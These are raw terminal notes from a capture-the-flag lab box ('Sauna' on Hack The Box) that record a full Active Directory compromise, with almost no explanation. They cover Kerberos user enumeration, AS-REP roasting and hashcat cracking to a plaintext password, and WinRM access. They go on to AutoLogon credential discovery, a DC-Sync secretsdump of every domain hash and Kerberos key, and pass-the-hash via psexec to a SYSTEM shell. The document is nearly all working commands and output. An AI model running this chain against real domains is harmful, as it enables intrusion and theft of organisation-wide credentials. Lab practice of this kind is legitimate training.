nmap -sV -sC -A 10.10.10.175 -oA nmap

enum4linx 10.10.10.175

Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766

./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/npe/Documen>

2021/02/04 11:54:35 >  Using KDC(s):
2021/02/04 11:54:35 >   10.10.10.175:88

2021/02/04 11:54:35 >  [+] VALID USERNAME:       administrator@EGOTISTICAL-BANK.LOCAL
2021/02/04 11:54:35 >  [+] VALID USERNAME:       Administrator@EGOTISTICAL-BANK.LOCAL
2021/02/04 11:54:35 >  Done! Tested 2 usernames (2 valid) in 0.048 seconds


┌─[npe@pcs-pentest]─[/usr/share/doc/python3-impacket/examples]
└──╼ $python3 GetNPUsers.py EGOTISTICAL-BANK.local/administrator
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Cannot authenticate administrator, getting its TGT
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[npe@pcs-pentest]─[/usr/share/doc/python3-impacket/examples]
└──╼ $python3 GetNPUsers.py EGOTISTICAL-BANK.local/fsmith
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e37dd15f49f6322eb0d15358fad878c5$affdadda94e42f30>

hashcat -m 18200 krbhash /usr/share/wordlists/rockyou.txt.gz

fsmith:Thestrokes23

crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23 --shares

evil-winrm
┌─[npe@pcs-pentest]─[~/Documents/HTB/lab/sauna]
└──╼ $evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
cd *Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
1b5520b98d97cf17f24122a55baf70cf
*Evil-WinRM* PS C:\Users\FSmith\Desktop>

WinPeas

+] Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\FSmith : FSmith [AllAccess]
    C:\Users\Public
    C:\Users\svc_loanmgr

  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

DC-SYNC attack
──╼ $impacket-secretsdump egotistical-bank/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a2>
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a2>
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04>
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:108814934abb6aa0a59b79c624aad945:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74>
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f>
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefa>
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec8058489>
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43c>
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:98230ad61d12b55fc1593e2ca8cb1d54ca17c03387e178729da70857caa1df>
SAUNA$:aes128-cts-hmac-sha1-96:e476a470e33b55000ffc5121a549a532
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...


└──╼ $crackmapexec smb 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA)>
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\administrator >

┌─[npe@pcs-pentest]─[/usr/share/doc/python3-impacket/examples]
└──╼ $python3 psexec.py egotistical-bank.local/administrator@10.10.10.175 -hashes d9485863c1e>
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file JYHbfaHU.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service UceD on 10.10.10.175.....
[*] Starting service UceD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd ..

C:\Windows>cd..

C:\>cd Users

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
C:\Users\Administrator\Desktop>
